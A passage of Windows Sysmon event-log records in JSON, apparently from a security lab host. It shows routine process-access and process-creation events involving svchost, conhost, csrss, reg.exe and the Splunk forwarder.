05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2706,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2707,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2708,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:30.389\r\nSourceProcessGUID: {A837DB8D-01F2-5F25-0000-00109CD30400}\r\nSourceProcessId: 4996\r\nSourceThreadId: 5016\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {A837DB8D-01F2-5F25-0000-001057D60400}\r\nTargetProcessId: 5056\r\nTargetImage: C:\\Windows\\system32\\reg.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:30.389","SourceProcessGUID":"{A837DB8D-01F2-5F25-0000-00109CD30400}","SourceProcessId":"4996","SourceThreadId":"5016","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{A837DB8D-01F2-5F25-0000-001057D60400}","TargetProcessId":"5056","TargetImage":"C:\\Windows\\system32\\reg.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":2709,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nProcessGuid: {A837DB8D-0209-5F25-0000-0010B2DB0400}\r\nProcessId: 4276\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nFileVersion: 10.0.10011.16384\r\nDescription: SplunkMonNoHandle Control Program\r\nProduct: Windows (R) Win 7 DDK driver\r\nCompany: Windows (R) Win 7 DDK provider\r\nOriginalFileName: SplunkMonNoHandle.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8\r\nParentProcessGuid: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nParentProcessId: 3088\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","ProcessGuid":"{A837DB8D-0209-5F25-0000-0010B2DB0400}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","FileVersion":"10.0.10011.16384","Description":"SplunkMonNoHandle Control Program","Product":"Windows (R) Win 7 DDK driver","Company":"Windows (R) Win 7 DDK provider","OriginalFileName":"SplunkMonNoHandle.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8","ParentProcessGuid":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","ParentProcessId":"3088","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2710,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01C5-5F25-0000-0010C3C30200}\r\nSourceProcessId: 3088\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {A837DB8D-0209-5F25-0000-0010B2DB0400}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01C5-5F25-0000-0010C3C30200}","SourceProcessId":"3088","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{A837DB8D-0209-5F25-0000-0010B2DB0400}","TargetProcessId":"4276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2711,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0209-5F25-0000-0010B2DB0400}\r\nTargetProcessId: 4276\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0209-5F25-0000-0010B2DB0400}","TargetProcessId":"4276","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-MonitorNoHandle.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2712,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2713,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:47:53.194","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:47:54","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:47:53","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":2714,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:47:53.194\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 